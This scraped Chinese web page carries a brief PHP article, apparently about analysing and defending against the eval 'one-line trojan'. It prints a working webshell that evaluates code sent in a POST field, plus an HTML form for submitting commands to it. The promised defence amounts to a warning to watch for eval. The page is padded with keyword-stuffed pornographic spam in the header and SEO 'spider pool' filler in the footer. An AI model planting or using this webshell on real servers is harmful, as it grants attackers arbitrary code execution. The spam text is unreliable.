国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 開發 > PHP > 正文

php eval函數一句話木馬代碼分析與防御之道

2024-05-04 23:35:25
字體:
來源:轉載
供稿:網友

這個是php常見的一句話木馬的源碼,通過post木馬程序來實現木馬的植入,eval()函數把字符串按照PHP代碼來計算。該字符串必須是合法的PHP代碼,且必須以分號結尾。如果沒有在代碼字符串中調用return語句,則返回NULL。如果代碼中存在解析錯誤,則eval()函數返回false。

eval可以用來執行任何其他php代碼,所以對于代碼里發現了eval函數一定要小心,可能是木馬

就這一句話害死人,這樣任何人都可以post任何文件上來,所以要做好防范

 

 
  1. <?php @eval($_POST['c']);?> 

使用方法也很簡單,本地提交文件指向提交文件,里面的php代碼就會被執行

 

 
  1. <html>  
  2. <body>  
  3. <form action="a.php" method="post">  
  4. <input type="text" name="c" value="phpinfo();">  
  5. <input type="submit" value="submit">  
  6. </form>  
  7. </body>  
  8. </html> 

以上所述就是本文的全部內容了,希望大家能夠喜歡。

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 仁寿县| 手游| 临沧市| 陕西省| 罗平县| 丹东市| 阿图什市| 富川| 阳泉市| 清流县| 石首市| 陕西省| 米脂县| 喀喇| 新源县| 时尚| 那曲县| 白朗县| 彭泽县| 松阳县| 彰化市| 永福县| 灵石县| 全州县| 美姑县| 迭部县| 长丰县| 泰顺县| 康马县| 文山县| 张家界市| 宜川县| 吉木萨尔县| 肇源县| 丰顺县| 沭阳县| 北流市| 广元市| 隆化县| 涞源县| 黔西|